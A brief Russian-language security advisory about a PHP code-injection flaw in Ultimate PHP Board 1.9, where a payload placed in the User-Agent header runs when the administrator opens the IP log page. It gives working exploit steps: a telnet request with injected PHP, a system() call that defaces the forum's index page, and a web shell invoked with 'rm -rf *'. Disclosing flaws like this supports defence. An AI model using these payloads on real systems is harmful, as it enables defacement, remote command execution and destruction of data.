Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный пользователь может выполнить произвольный PHP код на системе как UPB администратор. 

F0KP сообщает, что в этом форуме присутствует серьезная уязвимость, которая
позволяет атакующему выполнять произвольный php код. UPB протоколирует некоторую информацию о посетителях [такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории `db', который называется `iplog'.
Затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает `iplog'. Например: 

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>

когда администратор вызовет admin_iplog.php, ваш код php будет выполнен.

Пример: 

1. <? system( "echo \'hacked\' > ../index.html" ); ?>

дефейсит главную страницу форума. 

2. создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf * 

после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php. 

Уязвимость обнаружена в Ultimate PHP Board 1.9.

Оставить мнение